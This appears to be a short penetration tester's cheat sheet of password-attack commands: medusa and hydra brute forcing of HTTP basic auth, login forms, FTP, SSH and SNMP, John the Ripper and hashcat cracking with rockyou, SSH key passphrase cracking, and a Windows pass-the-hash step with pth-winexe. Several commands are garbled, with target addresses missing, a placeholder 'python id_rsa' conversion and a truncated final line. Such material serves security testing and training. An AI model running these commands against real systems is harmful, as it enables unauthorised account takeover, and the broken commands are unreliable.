Password attacks



Brute force basic http authorizations.
medusa -h -u admin -P password.txt -M http -m DIR:/admin -T 10


Can be used to brute force numerous services.
hydra -P password.txt -v snmp
hydra -l admin -P password.txt -v ftp
hydra -l root -P password.txt ssh
hydra -L users.txt -P password.txt www-get /admin

** Brute force http-post login forms

Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>"
Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"

John the Ripper

john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt

SSH keys

To crack SSH key passwords convert the key to a hash, then crack using John.
python id_rsa > id_rsa.hash


hashcat -m (mode) -a 0 hash.txt Pass.txt

Passing the hash (Windows)

Create environment variable SMBHASH, containing hash we want to pass
export SMBHASH=hashvalue
Use pth-winexe to authenticate: pth-winexe -U administrator% //